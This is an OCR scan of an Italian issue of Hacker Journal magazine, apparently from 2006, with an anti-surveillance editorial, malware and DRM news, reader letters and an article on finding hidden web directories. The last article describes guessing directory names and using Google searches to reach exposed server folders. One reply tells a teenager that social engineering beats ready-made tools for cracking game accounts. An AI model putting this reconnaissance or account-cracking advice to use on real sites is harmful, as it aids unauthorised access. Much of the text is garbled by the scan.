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hacker (hàk’dr) 

“Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione 
e come espandere le loro capacità, a differenza di molti utenti, 
che preferiscono imparare solamente il minimo necessario.” 


TTT 


Sangue, sudore e lacrime 


Winston Churchill, Il Guerra Mondiale. Annunciava agli Inglesi che avrebbero vinto con 
tro i nazisti. E spiegava a che prezzo. Per fortuna gli Inglesi l'hanno ascoltato. Non abbia 
mo più nazisti in giro. A parte qualche deficiente. Ma sono pochi. Se dobbiamo combat 
fere una battaglia, non è per la vita. Ma dobbiamo combatterla. Per la libertà. Per esem 
pio, Telecom Italia. Arrivano in tutte le case. Guardi nel muro e c’è una presa del telefono 
Novantanove volte su cento è una presa Telecom. Normale, uno dice. È l'azienda del te 
lefono. Sono i cavi del telefono. Normale un accidente. Telecom aveva un reparto segre 
to e illegale. Addetto alle intercettazioni. Un numero impensabile ogni anno. Hanno spia 
to l'impossibile. Giornalisti. Politici. Banchieri. Persone comuni. Non sappiamo quando 
Non sappiamo quanto. 


Facciamo un articolo su Ethereal e dobbiamo pesarlo con il bi¬ 
lancino. Se l'avvocato dice che può sembrare istigazione a 
delinquere, dobbiamo dire le stesse cose in altro modo. 

È un mondo dove imparare a usare un programma diven¬ 
ta crimine informatico. Se lo decide la polizia. O qualche 
giudice intraprendente. Invece, se ti vogliono mettere il 
telefono in ascolto, nessun problema. Registrano. Archi¬ 
viano. Ascoltano. Classificano. Ed è solo la punta dell'ice¬ 
berg. Da qualche parte, c’è un finanziere che sta sniffan¬ 
do il mio traffico dati. Mica perché è il mio. Perché stavol¬ 
ta tocca a me. Domani toccherà a te. O ti è già toccato ie¬ 
ri. Ci salvano solo due cose. Una è il numero. Siamo in tan¬ 
ti. Stiamo diventando troppi. Impossibile spiare tutti. L'altra 
sono quegli articoli. 


Possiamo difenderci solo se sappiamo qual è la minaccia. 

Possiamo difenderci solo se siamo in tanti. Tantissimi. Di più. La 
guerra è già in corso. Questa mattina, all'alba, la polizia ha tirato 
qualcuno giù dal letto. Un criminale. Ha fatto cose terribili. Si è di¬ 
menticato acceso il P2P e ha scaricato una canzone di troppo. 

Oppure si è dimenticato di attivare il firewall. O vai a sapere. Domattina 
tireranno già dal letto qualcun altro. E sarà sempre peggio. La nostra di¬ 
fesa è il numero. Se tutti sanno difendersi, nessuno può essere attaccato. Se 
qualcuno viene attaccato, possiamo contrattaccare. La nostra difesa è sapere. Se sappia¬ 
mo, non ci possono fregare. Se non sappiamo, ci fregano. Alla fine vinceremo. La battaglia 
del sapere è quella giusta. Ci saranno vittime. Non esistono guerre indolori. Non esistono 
nemmeno guerre ignorabili. Se il nemico èli e ti spia, e ti attacca, puoi solo difenderti. La 
nostra illusione quotidiana è che ci saranno vittime. Ma tanti lettori di questo stupido gior¬ 
nale si salveranno. Lo stupido giornale si ostina a raccontare cose che altri tacciono. Insi¬ 
ste a voler spiegare come stanno le cose. Quali sono gli strumenti. 

Sangue, sudore e lacrime. Ma arriveremo a un mondo senza spioni di Stato. 
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Diteci cosa ne pensate di HJ, siamo tutti raggiungibili via e-mail, tramite lettera o messo 

a cavallo... Vogliamo sapere se siete contenti, critici, incazzati o qualunque altra cosa! 

Appena possiamo rispondiamo a tutti, scrivete! 
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SECURITY UPDATE 



:: Da IE6 a IE7P 
Nuovi problemi 

Con una rivelazione che non ha sorpre¬ 
so troppa gente, l’agenzia di sicurezza 
informatica Secunia ha informato che 
esiste un nuovo, grave punto debole di 
Internet Explorer 7. Sebbene non sia an¬ 
cora conosciuto e non facilmente sfrutta¬ 
bile, potrebbe mettere il computer ospite 
a rischio di attacchi di phishing. 

Il problema sembra trarre origine dalla 
possibilità di vedersi aprire una finestra 
di pop-up che, aH’interno della sua barra 
di URL, conterrà un indirizzo maschera¬ 
to solamente in modo parziale. 

Questo indirizzo mascherato presenterà 
solamente alcune informazioni che pos¬ 
sono far credere all'utente che tutto stia 
funzionando per il verso giusto (sopra¬ 
tutto se compaiono parole “rassicuran¬ 
ti”, come per esempio “microsoft.com"). 
L'effetto che si otterrebbe sarebbe quel¬ 
lo di avere una finestra che spalanca le 
porte al phishing, autorizzata dall’utente 
perché solo una parte del suo indirizzo 
(quella visibile) gli dice che va tutto be¬ 
ne, mentre tracce di pericolosità (il resto 
deH'idirizzo) non sarebbero visibili. 
Questo tipo di problema sembra esserci 
anche per Firefox 2, sebbene in versio¬ 
ne ridotta. Con Firefox, infatti, vedrem¬ 
mo visualizzato solo il contenuto della 
finestra, senza essere tratti in inganno 
dalla barra degli indirizzi. 



A Dal sito di Secunia (www.secunia.com) è 
possibile scaricare un foni che permette di 
visualizzare la parte nascosta dell URL 
della finestra di phishing. 

Secondo alcuni questo tipo di proble¬ 
ma non è propriamente tale, ossia non 
si tratta di un vero e proprio pericolo, ma 


solamente un modo un po’ sottile di uti¬ 
lizzare per scopi disdicevoli una funzio¬ 
ne di IE7. Resta il fatto che la presenza 
di questo “buco”, mostra che il browser 
è tutto tranne che sicuro. 



▲ La volpe rossa spopola, diamole la 
caccia ma teniamola viva, e adottiamola. 


:: Firefox 2.0 pulisce 
con un solo click 

Dati personali protetti al massimo con 
l’uso di un solo clic. È uno dei risulta¬ 
ti della risposta di Firefox all’aggiorna- 
mento di Interne Explorer. Con la ver¬ 
sione 2.0, il prodotto Mozilla vuole con¬ 
tinuare a dare del filo da torcere al brow¬ 
ser Microsoft. La percentuale di utilizza¬ 
tori di Firefox nel mondo continua a cre¬ 
scere. Siamo ben lontani dall’82 percen¬ 
to di Microsoft IE, ma con un 12 percen¬ 
to di Firefox usati quest’anno dagli uten¬ 
ti del web abbiamo ottenuto un succes¬ 
so di distribuzione veramente notevole, 
che fa ben sperare. 

Link: www.mozilla.it 

:: Esperio in frodi a 28 anni 

Ha gabbato almeno 120 conti corren¬ 
ti bancari di altrettanti clienti delle mag¬ 
giori banche Sud Africane. A detta delle 
agenzie di sicurezza internazionali che 
si erano messe sulle tracce del frodato¬ 
re, il sistema era ingegnoso e sofisticato. 
Uno spyware abilmente distribuito negli 
Internet Cafè raccoglieva dati sensibi¬ 
li, password, PIN e numeri di conto, per 
spedirli in un server dell'Estonia. 

Le transazioni successive con i dati dei 
clienti erano poi effettuate usando un 
cellulare e un servizio dati di Vodacom. 
Finalmente, dopo mesi di appostamenti 


Macelli, traili 

e furti: 

il nostro futuro 

\ _ 

digitali e intercettazioni, si è individuato 
un appartamento di Cape Town da cui 
partivano le richieste. Un successo inter¬ 
nazionale con una morale: non usiamo 
l’home banking dagli Internet Cafè! 

Link: http://business.iafrica.com/ 
news/326342.htm 




A Internet cafè: usiamoli per tutto, ma non 
per l’ho me banking. 


::SpamThru vuole 
il monopolio 

È arrivato SpamThru, il trojan definito ami¬ 
co degli antivirus. Si tratta di un malware 
che ci infetta in seguito a scambi p2p e il 
cui compito è quello di inserire il compu¬ 
ter che lo ospita aH’interno di una botnet. 
La vera novità è che SpamThru scarica 
una versione piratata di Kaspersky An- 
tiVirus e con esso... elimina gli altri con¬ 
correnti! Insomma, si tratta di un vero e 
proprio malware geloso del proprio spa¬ 
zio vitale. Ora il fatto che voglia assicurar¬ 
si accesso illimitato alle risorse di siste¬ 
ma senza avere tra i piedi altri avversa¬ 
ri non è una cosa particolarmente brutta, 
perché nel momento in cui dovessimo in¬ 
dividuarlo sapremo che abbiamo un solo 
malware con cui fare i conti. Una cosa in¬ 
vece brutta è il fatto che installa un vero 
e proprio blocco che impedisce l’installa¬ 
zione di aggiornamenti agli antivirus di si¬ 
stema. Inquietante, vero? 
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CANCELLA PIÙ 


S alve a tutti, sono un lettore appassio¬ 
nato della Vostra rivista, e sono molto 
soddisfatto del vostro giornale, lo oltre a 
congratularmi con voi vi scrivo per chie¬ 
dervi aiuto. Praticamente, qualche gior¬ 
no fa, cercavo di installare il programma 
“etherear, durante il download fatto da 
internet si è staccata la corrente, il grup¬ 
po di continuità non ha retto e pertanto il 
download si è interrotto, però sul desktop 
è apparsa un'icona del programma ethe- 
real-setup-0.99.0.exe che non si vuole 
cancellare in nessun modo. Come devo 
fare per cancellare questa icona? Per fa¬ 
vore aiutatemi al più presto, grazie 

SocratelO 

Salute, SocratelO. Grazie per i compli¬ 
menti. Vediamo un po' di capire come 
stanno le cose e di darti una risposta 
che ti possa soddisfare. In realtà c'è 
un piccolo problema... 

Quando Windows s'incaponisce non 
c’è verso di fargliela capire... 

Il nostro suggerimento è di provare 
dalla modalità provvisoria. 

Oppure usa questo: http://ccollomb. 
free.fr/unlocker/index.htm. 

Così dovresti riuscirci. 




'er i file che non si cancellano, ci vuole 
una gomma speciale. 


www.hackeriournal.it 


M i chiedevo: ma come fanno a funzio¬ 
nare i riscaldatori di caffè che si at¬ 
taccano alla Usb? Non si preleva troppa 
corrente rischiando di bruciare tutto? 

Costantino 

Caro Costantino, la domanda che ti fai 
è più che giustificata, ma per fortuna 
l’interfaccia Usb è più intelligente del 
previsto. Infatti anche l'alimentazione 
sulla presa Usb è regolata dai chip che 
governano l'interfaccia. Quindi i casi 
sono due: o la periferica è intelligen¬ 



te, e allora usa del- 
l’handshacking via 
Usb per regolare 
la quantità di cor¬ 
rente che le ser- ' 
ve, oppure è so¬ 
lamente un as¬ 
sorbitore di cor¬ 
rente, che succhia fin che può. Ma i chip 
dietro ad esso gli danno solamente un 
massimo di 500 mA o meno, se contem¬ 
poraneamente colleghiamo altri dispo¬ 
sitivi. Quindi niente paura: alla peggio 
il caffè sarà un po’ meno caldo. 



H i! Secondo voi è possibile overclocka- 
re i nuovi processori Intel Core 2? Se 
si, come si fa? 

Giorgio 

Caro Giorgio, se cerchi su Google tro¬ 
vi tutte le informazioni che ti possono 
servire. Sono stati fatti esperimenti di 
ogni tipo. Il primo sistema da adottare 
è sicuramente settare i parametri della 
CPU con qualcosa del tipo EasyTune 5 
(www.gigabayte.com.tw). Pasticciando 
un po’ con i parametri c’è chi è arriva¬ 
to ai 533 Ghz di FSB, ovvero la velocità 



pi 



H o sfidato un mio amico a trovare po¬ 
sti strani usando le mappe di Goo¬ 
gle, chi ne trova di più vince. Non è che 
mi dareste una mano?... 

+.+Newhammer+. + 

Caro +.+Newhammer+.+, dipende cosa 
intendete per strani’ e poi... se li pub¬ 
blichiamo anche il tuo amico li può tro¬ 
vare!... Comunque eccoti accontenta¬ 
to; prova questi. 

- Piattaforme di lancio della Nasa: 

http://snipurl.com/10adn 

- Caccia americani pronti a decolla- 



di scambio dati sul Front Side Bus, sul 
quale scorrono i dati da CPU a memo¬ 
ria, vero collo di bottiglia di ogni scheda 
madre. Poi c’è il problema del raffredda¬ 
mento, quando anche la CPU gira più 
veloce del previsto. Qui alcuni temera¬ 
ri sono arrivati a togliere il case metalli¬ 
co che contiene il chip, tramite una pi¬ 
stola ad aria calda e... pregando di non 
fondere le saldature interne. Lo scopo è 
applicare direttamente sul chip altri po¬ 
tenti sistemi di raffreddamento. Roba 
da ricchi: se si sbaglia qualcosa, butta¬ 
re la CPU nel cestino significa disfarsi 
di abbondanti centinaia di euro. 


◄ “Scemo chi 
legge " ma a 
livello 
lanetario... 
Come a scuola. 

re alla base di Langley: http://snipurl. 
com/IOadx 

-... meglio non saperlo (e non farci il 
bagno) vicino a San Clemente, in 
California: http://snipurl.com/10ae9 

- Il cratere lasciato da un'esplosione 
atomica sotterranea, nel Nevada: 
http://snipurl.com/10aeg 

- Ehm... asino chi legge?: 
http://snipurl.com/10aje 
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C iao! Ho comprato oggi per 
la prima volta la vostra rivi¬ 
sta e devo dire che... mi piace! 

Ok, non sono un grande intendi¬ 
tore ma me la cavicchio come si 
dice! Dimenticavo di presentar¬ 
mi... Omar 31 anni Venezia. 

Solo un appunto... i vostri arti¬ 
coli sono molto interessanti, ma 
qualche volta dovreste appro¬ 
fondire un po' di più...Tipo: par¬ 
late della polizia e di come in¬ 
castrano chi usa i p2p, ma poi 
quando parlate del programma 
Mute gli dedicate solo un picco¬ 
lo riquadro... E quando ne par¬ 
late nel l'articolo lo fate in modo 

che sembra un riassunto di un testo più ampio... avete poca carta? 
:-) A parte questo... da oggi avete un lettore in più! 

Baci e buon lavoro!!! 


A Alla fine, anche le copie di Hacker Journal 
finiscono cosi. Non sprechiamo la carta! 


Omar 


Piacere di conoscerti Omar 31 anni Venezia! :) 

Beh, non è che un articolo di due pagine possa dire sempre tutto. La carta? Sì, 
quella manca sul serio. Perché non stiamo scrivendo dei libri, ma degli artico¬ 
li... :) I riquadri sono fatti apposta per dare spunti ulteriori all’argomento prin¬ 
cipale deM’articolo. Poi non tutti gli articoli possono essere troppo approfon¬ 
diti. Una volta si parla di un problema in generale, un’altra volta lo si approfon¬ 
disce fino ai trucchi più segreti di un codice nascosto. È così, anche per bilan¬ 
ciare e rendere gradevole la lettura a chi si avvicina per la prima volta e a chi 
invece è già un super-genio navigato... Continuando a seguirci ogni argomen¬ 
to viene approfondito, prima o poi! 

Grazie comunque, degli ‘appunti’ così ci fanno solo bene e ci aiutano a capire 
ogni vostro desiderio. 


I Iso abitualmente Windows XP ma 
non riesco a trovare la funzione che 
mi permetta di creare un CD bootable, o 
comunque di creare un CD da un'imma¬ 
gine .iso. Non posso credere che non sia 
possibile, anche perché ho visto dei miei 
amici che usano MacOSX che lo fanno. 
i Voi sicuramente saprete come fare. 

! Mi dite qualcosa? 

Roberto 

Caro Roberto, invece quello che dici 
tu, ci risulta che sia possibile. 

Ossia, è possibile che Windows non 
io permetta e che, invece, il sistema di 


MacOSX lo faccia. 

È certamente una delle (tante) pec¬ 
che di Windows e non c’è nulla da fa¬ 
re, dobbiamo usare un programma ap¬ 
posito, come Nero o altri. 


C iao, sono alexkingdom e ho 16 an¬ 
ni (li ho appena compiuti ), vorrei 
chiederti una cosa, lo volevo cracca¬ 
re degli account in un gioco Online, 
non per fare qualcosa di male, anzi, 
non mi interessa nemmeno conser¬ 
varmi password o altri dati, ma vorrei 
specialmente provare a farlo per co¬ 
noscenza, e anche per controllare al¬ 
cune cose che i moderatori non fanno, 
come ad esempio gente che fa bug e 
chi li denuncia non riceve nemmeno 
una risposta. 

Mi potete consigliare qualche pro¬ 
gramma già pronto, o qualche meto¬ 
do per crearne uno? 

Alex 

Craccare un gioco online è un reato 
e ti sconsigliamo vivamente di pro¬ 
cedere in questo senso. Ti dicia¬ 
mo solo che l’ingegneria sociale, in 
casi come questo, è molto più effi¬ 
cace di un programma pronto (che 
non esiste; bisogna tenere conto di 
come è fatto quel programma spe¬ 
cifico). 

Tieni d’occhio la rivista, comunque, 
perché un pezzo per volta compa¬ 
re tutto quello che ti serve per ap¬ 
profondire le tue conoscenze, se ne 
vuoi fare buon uso. 


Ni wir\i 

up to 


A Craccare è reato, come scassinare 
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E IL PIO RICCO 

N ella guerra dei browser tra Internet 
Explorer 7 e Firefox 2 il programma 
di Mozilla Foundation ha diverse frecce 
al suo arco: gli add-on. Basta visitare 
la pagina https://addons.mozilla.org/ 
firefox/recommended/ per trovare i 
principali, raccomandati dagli stessi au¬ 
tori del browser del momento. Ce n’è per 
tutti: ChatZilla è un Client IRC, FireFTP 
permette di gestire con facilità i trasferi¬ 
menti di file via FTP, FireBug ci fa scopri¬ 
re i segreti del funzionamento di una pa¬ 
gina web, Adblock Plus blocca selettiva¬ 
mente le pubblicità fastidiose. Ed è solo 
l’inizio: sulla pagina segnalata ce ne so¬ 
no una ventina, ma è facile prevedere che 
presto aumenteranno a dismisura. 




e parlava da tempo, ma adesso la notizia è ufficiale: il comune 
Monaco di Baviera lascia Windows, Office e quasi tutto quanto 
è targato Microsoft per passare a Linux. La notizia aveva fatto scalpore 
quasi tre anni fa: Steve Ballmer era addirittura volato in Baviera con in tasca 
un’offerta speciale per gli amministratori tedeschi (si parlava di uno sconto 
del 90%), che però non ne avevano voluto sapere. 

Adesso però ci siamo: per quattordicimila computer del Comune di Mona¬ 
co è iniziata la sostituzione dei sistemi operativi: si passerà da Windows a 

. Linux (la soluzione scelta preve¬ 
de Debian GNU/Linux 3.1, 
interfaccia utente KDE 
3.5) assieme a pacchet¬ 
ti di Microsoft Office con 
OpenOffice 2. Ci vorrà 
un po' di tempo per sosti¬ 
tuire tutto, ma è un bel¬ 
l’inizio! La cosa davve¬ 
ro interessante di questa 
iniziativa è che costituirà 
un vero e proprio prece¬ 
dente: speriamo che ven¬ 
ga presto preso ad esem- 
^^Hpio e soprat- 

▲ Prosit per Linux! tutto da noi. 





■■■ 


NOZZE! 


C on l'obbiettivo di avere una collabo- 
razione molto forte e ricca di doni, 
Windows e SUSE Linux stanno per da¬ 
re il via a uno sviluppo congiunto per la 
creazione di nuove soluzioni di interope- 
rabilità tra le piattaforme di Microsoft e 
quella di Novell. Siamo forse di fronte a 
una vera svolta nella storia del colosso di 
Redmond: dopo la decisione di lasciare la 
Cina comunista, ora si aprono ai nemici. 
Cosa ci riserva il futuro? Il lupo sta forse 


cambiano il vizio oltre al pelo? L’accordo 
sarà valido fino al 2012 e prevede anche lo 
scambio dei brevetti necessari allo scam¬ 
bio tecnologico... Di sicuro tornerà a van¬ 
taggio di Novell! 




WIKIPEDIA 


FA SHOPPING 



U no shopping molto particolare, quel¬ 
lo di Wikipedia: Jimmy Wales, uno 
dei fondatori dell’enciclopedia libera, 
ha recentemente annunciato che potreb¬ 
be avere a disposizione cento milioni di 
dollari e che gli piacerebbe poterli usa¬ 
re per acquistare i diritti di opere pro¬ 
tette da copyright, in modo da poterle 
pubblicare integralmente e renderle co¬ 
sì accessibili a tutti. Tra le opere papabili 
Wales cita archivi fotografici, libri, archivi 































































HOT NEWS 


TUTTI PRONTI PER M AUDIO A MM VIDEO 


Q uesto è decisamente il periodo del¬ 
le applicazioni online: l’ultima nata è 
Scrybe, la cui beta dovrebbe essere di¬ 
sponibile proprio in questi giorni. Si trat¬ 
ta di un organizer, che permette di regi¬ 
strare e ordinare calendario, bookmark, 
appunti e altro ancora. La cosa veramen¬ 
te interessante è che si potrà lavorare an¬ 
che offline: la sincronizzazione avverrà al¬ 
la prima occasione possibile. Per saper¬ 
ne di più la pagi¬ 
na da consulta¬ 
re è http://www. 
iscrybe.com, che 
offre la possibi¬ 
lità di registrar¬ 
si per una beta e 
di vedere un fil¬ 
mato che spiega 
le funzionalità di 
Scrybe. 


Y ouTube, il sito recentemente acquista¬ 
to da Google, ha rimosso dai suoi ser¬ 
ver circa trentamila filmati a causa di una 
richiesta da parte della società giappo¬ 
nese degli autori ed editori, l’equivalente 
nipponico della Siae. Pare infatti che quei 
video fossero stati inseriti sul sito infran¬ 
gendo le leggi sul copyright. YouTube ha 
prontamente eseguito. 





Attacco al sito dei giornalisti 



7 1 sito deli Ordine dei Gior¬ 
nalisti (www.odg.it) è sta¬ 
to bloccato per alcune ore do¬ 
menica 22 ottobre , a causa di 
un attacco da parte di un or¬ 


ganizzazione che si è definita 
XJuardofTurkey and Islam". 
La hotnepage è stata sostitui¬ 
ta da un messaggio che accu¬ 
sava la Francia per le sue re¬ 


sponsabilità nel genocidio de¬ 
gli algerini. Va detto che l'at¬ 
tacco non è stato particolar¬ 
mente grave e che già dopo 
poche ore era tutto risolto. 



BLQOtfR CmESI* 


v 



L a notizia sta girando in rete 
da un po’: pare che i blogger 
cinesi non potranno più conser¬ 
vare l’anonimato, ma dovranno 
fornire un vero nome per poter 
scrivere online. La ISC (Internet 
Society of China) sta facendo i sal¬ 
ti mortali per evitare la riprovazione 
mondiale, affermando che in real¬ 
tà non è stata ancora presa alcu¬ 
na decisione, ma che questa mo¬ 
difica al sistema è inevitabile per lo 
sviluppo dei suoi blogger. Che co¬ 
sa significhi non è molto chiaro, an¬ 
che se gli oltre 17 milioni di blogger 
cinesi forse lo sanno, purtroppo per 
loro. Gli 
ag¬ 
giorna¬ 
menti, in 
inglese, 
si posso- 



gere sul 
sito del¬ 
l’agenzia 
informativa cinese Xinhua. allindi 
rizzo http://snipurl.com/10d8f. 


di giornali. Il messaggio, che ha ricevuto 
parecchie risposte e che si può leggere al¬ 
l’indirizzo http://snipurl.com/10al3, lascia 
aperte molte speranze. Ne riparliamo tra 
qualche mese. 
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S econdo la polizia inglese, sono almeno 8.500 le vittime di furto di 
dati sensibili e password dai loro computer. Il furto è stato reso 
possibile da un programma chiamato Haxdoor, in grado di raccogliere le 
password registrate su un computer, trasmetterle a un indirizzo di posta 

elettronica e poi disabilitare il firewall della mac¬ 
china attaccata. Ovviamente i computer infettati 
non erano protetti con software antivirus e patch 
di protezione. Il programma, come avviene spes¬ 
so, si trasmette con allegati a messaggi e-mail o 
anche di chat. Maggiori dettagli si trovano sulla 
pagina http://snipurl.com/10d9g. 
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APPLE, VS \ 
MICROSOFT ' 


a Qiamo irritati perché Windows non è rigoroso contro vi- 
Orus di questo tipo e siamo ancora più irritati per non es¬ 
sercene accorti prima” 

(tratto da un comunicato stampa Apple) 


1100taiOt11109100101QG1100t01Q1111li 




:: l’iPod con il virus dentro 


:: DVD Jon non lo ferma nessuno 


to il problema. È stato chiamato in tribunale per avere violato 
la legge e le accuse sono cadute per due volte. D'altro canto, 
che legge si viola guardandosi un DVD su Linux? Da lì in poi, 

per tutti, è stato DVD Jon 
Oggi DVD Jon (www.nanocrew. 
net/) ha 22 anni e ne ha fatta un'al¬ 
tra delle sue. Ha preso FairPlay, il 
DRM di Apple, e ne ha fatto il re¬ 
verse engineering. Senza toccare il 
software originale, ha scritto un al¬ 
tro software, originale, che si com- 
già hacker...! porta nello stesso modo e può deci¬ 

frare la protezione musicale dellTTu- 
nes Store. Insomma, si tratta di un'operazione per tutti, no? 

E perché solo Apple deve fare i soldi in quel modo? DVD 


l’iPod lo fa Apple. Apple fa Mac OS X e questo è sicuro. I 
virus li prende Windows. Windows lo fa Microsoft. È Mi¬ 
crosoft che dovrebbe avere i virus. Allora, perché sono gira¬ 
ti iPod con dentro virus? 

Eppure è successo. Un piccolo quantitativo di iPod ha lasciato 
la fabbrica con dentro un regalino imprevisto: un virus nean¬ 
che tanto nuovo chiamato RavMonE.exe. Apple ha emesso 
un comunicato in cui rimproverava Microsoft di non essere 
abbastanza efficace contro i virus. 

Allora Microsoft ha rimproverato Apple di avere un controllo 
scarso sulla qualità degli iPod. Sembravano Stanlio e Ollio. 
Mentre le due grandi aziende litigavano come a una riunione 
di condominio, giravano iPod con i virus, alla faccia dei clienti. 
Pericolosi solo se collegti a un PC Windows, questo sì. 


Jon Lech Johansen è il nostro idolo. Aveva solo 17 anni 
quando si è accorto che con il suo computer Linux non 
poteva guardarsi i DVD regolarmente comprati dalla sua 

0100101 ,am '9 ,ia - E ha fat, ° una cosuccia: ha scritto DeCSS e ha risol- 
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SE c E H VIRUS 
NElUPOO 


R avMonE.exe è un worm scritto in Python e convertito 
in eseguibile Windows con il tool Py2exe (http://www. 
py2exe.org/). È banalotto (ma oltre a copiarsi sui dischi apre an¬ 
che una backdoor sui sistemi infettati) e praticamente qualsiasi 
antivirus aggiornato lo intercetta e lo elimina. Al limite, basta sca¬ 
ricare uno dei tanti antivirus per Windows in prova gratuita per 
trenta giorni e sbrigare il lavoro. Una buona dose di informazioni 
sul virus si può trovare per esempio su http://snipurl.com/10h1a. 
la pagina Apple di supporto sta a http://snipurl.com/10h35. 


Jon ha avuto un’idea. Ha fondato un’azienda, chiamata Dou- 
bleTwist Ventures (http://doubletwistventures.com/). E ades¬ 
so venderà il suo software alle aziende disposte ad acqui¬ 
starne la licenza. 

Apple non ha ancora parlato, né si è ancora mossa. L’algorit¬ 
mo di FairPlay è di pubblico dominio; è difficile stabilire se ci 
siano basi legali per accusarlo di qualcosa. Se non fa niente, 
e se Jon porta avanti la sua iniziativa, succederà che il mo¬ 
nopolio Apple potrebbe crollare. 

Attualmente, una canzone comprata da iTunes Store può es¬ 
sere ascoltata solo su iPod (può essere masterizzata come 
MP3 su un CD e lì viene sottratta alla protezione, ma è un’al¬ 
tra questione). Sempre attualmente, una canzone comprata 
su un altro store musicale e protetta con un altro DRM non 
funziona su un iPod. 

Un’azienda che acquistasse il software di DVD Jon potreb¬ 
be fare due cose: creare lettori di musica che possono ripro¬ 
durre canzoni protette comprate su iTunes Music Store; op¬ 
pure vendere canzoni protette che possono essere esegui¬ 
te su un iPod. 

La cosa interessante e allo stesso tempo paradossale di que¬ 
sta situazione, è che in pratica, per riuscire a mettere finire al 
monopolio di Apple, il software di DVD Jon riveste le canzoni 
di un guscio di codice. Questo strato di codifica aggiuntiva, a 
sua volta, è un vero e proprio DRM! Solo che questa volta il 
DRM permetterebbe di ascoltare i brani dovunque, da qual¬ 
siasi negozio online li si compri, sen¬ 
za rispettare più i limiti concepiti a li¬ 
vello originario. 

Sarebbe un passo intelligente. For¬ 
se è per questo che ci vuole tanta 
fatica a farlo capire a tutti. 

Intanto facciamo gli auguri a 
DVD Jon. Prima di lui ci ave¬ 
va provato RealNetworks, 
^ ma facendo fiasco a cau- 

k sa dei cambiamenti ap- 

■ ^ portati a FairPlay da 

H Apple. 

H La sua idea si sta 

H dimostrando sem- 

■ pIice ma estre- 

mamente 

■ cace. 


A Jon Lech 
Johansen, 
oggi. 
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MICROSOFT 
VS APPLE 


1\ 


Moti è questione della piattaforma su cui è nato il virus. 

II fatto che si trovi su un player di musica significa che c'è 
un problema nel modo in cui vengono controllati i contenuti e la 
qualità del prodotto" 

(Jonathan Poon, addetto Microsoft a! controllo antivirus prima 
dell’uscita del software) 







E allora, DVD Jon, i virus... la vittima è Apple e la guerra 
nella musica la sta vincendo Microsoft? Ma proprio no. 
La stanno perdendo tutti, invece. 

Già a settembre il DRM di Micro¬ 
soft è stato violato da un program¬ 
mino chiamato FairUse4WM. Mi¬ 
crosoft, normalmente addormen¬ 
tata, si risveglia subito quando si 
tratta di DRM, e ha chiuso subito 
la falla. Sono bastati pochi giorni 
e i programmatori dello hack han¬ 
no semplicemente aggiornato il 
loro software. È cominciata così 
una classica lotta tra guardie e la¬ 
dri. La versione più recente che ci 
risulta di FairUse4WM si trova a 
http://snipurl.com/10h2e, ma non 
possiamo garantire che funzione¬ 
rà, o che ne serva una più nuova 

(in tutti i casi, va usata solo sui file musicali legittimamente in 
nostro possesso, e non per rubare musica). 


:: Times are achanging (Bob Dylan) 


I tempi stanno cambiando. Le protezioni stupide sulla 
musica cadono una dopo l’altra. Non rubiamo, mai! Ma 
chiediamo sempre prezzi giusti e facciamo rispettare il no¬ 
stro diritto di fare quello che vo¬ 
gliamo della musica che abbia¬ 
mo legittimamente acquistato, 
compreso il poter fare copie di 
backup o prestare un pezzo ai 
nostri amici per permettergli 
di decidere se poi acquistar¬ 
lo o meno. 

Le protezioni sono stupide. Gli 
hacker sono intelligenti. So¬ 
prattutto quelli che trovano il modo di aggirare il sistema sen¬ 
za commettere reati. 

NeOkkON 
neOkkOn@hackerjoumal. it 






























apita a volte che, collegando 
ci a un server Web, ne pos 


http://www.citysupport.nl/preview/top/. 
PayPal 


siamo vedere la st 
le directo 


ura del 


Questo può fornire (abbiamo tenuto l’URL per esteso per 
indizi preziosi. Allo stesso tempo, non mostrare il punto all’inizio del nome fi- 


in questo caso, directory. Alcuni pro¬ 
grammi per fare siti generano cartelle 
con nomi prefissati. Altre volte ci sono 
abitudini consolidate. Altre volte si scel¬ 
gono metafore, per esempio il Sistema 


è detto che vediamo comunque tutte le le) 


solare, e tutto si chiama Mercurio, Gio- 


directory. Per esempio, un sistema Unix Quando è possibile formare URL co- 

non visualizza i file e le directory il cui me questi, è ampiamente probabile che 

nome inizia con il punto. ci sia sotto qualcosa, come un sito di 

Con una Shell Unix basta dare il coman- phishing o una directory che deve rima- 

do ls -a per mostrare tutto, ma un nere il più possibile nell’ombra, 
browser non è una Shell! Però, se cen- È importante capire che i contenuti del¬ 
iriamo esattamente l’URL, ce la possia- la directory nascosta non sono invisibi- 

mo fare ugualmente. Per esempio, cari- li. Lo è solo la directory! Se conoscia- 

chiamo la pagina mo il nome della directory, possiamo 






101 


Index of, 


!••]» «4 



Xi tilt ami a 



directory già nel browser. Possiamo vedere 
anche gli script e gli altri file che non si 
vedono consultando semplicemente l'Html. 

lOfìfil? 

■ ■ . . »"■ P »WPWW T W m m 
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vedere tranquillamente i file inserendo 
il nome della directory stessa nel per¬ 
corso giusto del filesystem, o nell’URL 
della pagina. 


:: Un bel gioco: 
indovina il nome 


Forse metà del lavoro di un hacker 
sta nell’abilità di indovinare I nomi 


Magari password, o forse, 




4Etica L 

I HackER? \ 

I l guaio è che ci troviamo in terra di 
nessuno. Le directory dei siti sono vi¬ 
sitabili digitando un URL e, se esiste un 
URL, abbiamo chiaramente il diritto di 
digitarlo. 

D’altra parte, si tratta di zone che non so¬ 
no state dichiarate esplicitamente visita- 
bili da qualcuno e, spesso, lo sono unica¬ 
mente per via della disattenzione o del¬ 
l'impreparazione di qualcuno. Nel deci¬ 
dere se curiosare dentro le directory di 
un sito, ricordiamoci che siamo hacker, 
non piratelli, e dunque agiamo sempre 
per un fine positivo, mai per fare danno 
a qualcuno. OK? 






























Index of /4carlweb/Refs/ vti_cnf 


Uno dei modi più semplici per im¬ 
pedire che Google possa curiosare 
nelle directory del nostro sito è im¬ 
pedire a GoogleBot, l’emissario del 
motore di ricerca che va in giro per 
il Web a raccogliere informazioni, di 
indicizzare i nostri materiali. 




a uuesta arre erory e sfora e re ara osile 
estensioni server di FrontPage Microsoft 
Non ci sono file particolarmente strani. 
Ma il punto è che per arrivare a vedere 
questa directory, in cui potrebbe invece 
esserci di tutto, è bastato... Google! 

Una ricerca di “ vnt enf" è sufficiente. 




_ notes re bene all’interno del server Web, che 

sia Apache, Microsoft IIS o altro, e fa¬ 
una directory creata da Adobe re in modo che: 

Dreamweaver per contenere file XML. 

1) sia disabilitato l'elenco delle di- 
Sembrano stupidate. Invece, non si ha rectory 
idea di quanti siti vengano penetrati 2) nessun file visibile le linki 

